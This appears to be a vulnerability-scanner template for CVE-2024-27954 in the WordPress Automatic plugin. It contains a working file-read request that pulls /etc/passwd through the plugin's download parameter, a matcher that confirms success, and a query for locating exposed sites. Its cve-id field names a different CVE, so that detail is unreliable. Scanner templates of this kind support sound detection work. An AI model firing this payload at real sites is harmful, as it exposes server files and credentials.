id: CVE-2024-27954 info: name: WordPress Automatic Plugin <3.92.1 - Arbitrary File Download and SSRF author: iamnoooob,rootxharsh,pdresearch severity: critical description: | WordPress Automatic plugin <3.92.1 is vulnerable to unauthenticated Arbitrary File Download and SSRF Located in the downloader.php file, could permit attackers to download any file from a site. Sensitive data, including login credentials and backup files, could fall into the wrong hands. This vulnerability has been patched in version 3.92.1. reference: - https://wpscan.com/vulnerability/53b97401-1352-477b-a69a-680b01ef7266/ - https://securityonline.info/40000-sites-exposed-wordpress-plugin-update-critical-cve-2024-27956-cve-2024-27954/#google_vignette - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27954 classification: cvss-score: 9.8 cve-id: CVE-2022-1970 cwe-id: CWE-918 metadata: verified: true max-request: 1 publicwww-query: "/wp-content/plugins/wp-automatic" tags: wpscan,cve,cve2024,wp,wordpress,wp-plugin,lfi,ssrf,wp-automatic http: - method: GET path: - "{{BaseURL}}/?p=3232&wp_automatic=download&link=file:///etc/passwd" matchers-condition: and matchers: - type: word part: body words: - '"link":"file:' - type: regex regex: - "root:.*:0:0:" # digest: 4b0a00483046022100f4561d82424240be6c3dc4fc29a070e44885e39d14ffcdbddae881eeaf89d958022100cf500bf58250d2b5bf2a94220a8afcd8531d91b7d914c46d485700c5558887ac:922c64590222798bb761d5b6d8e72950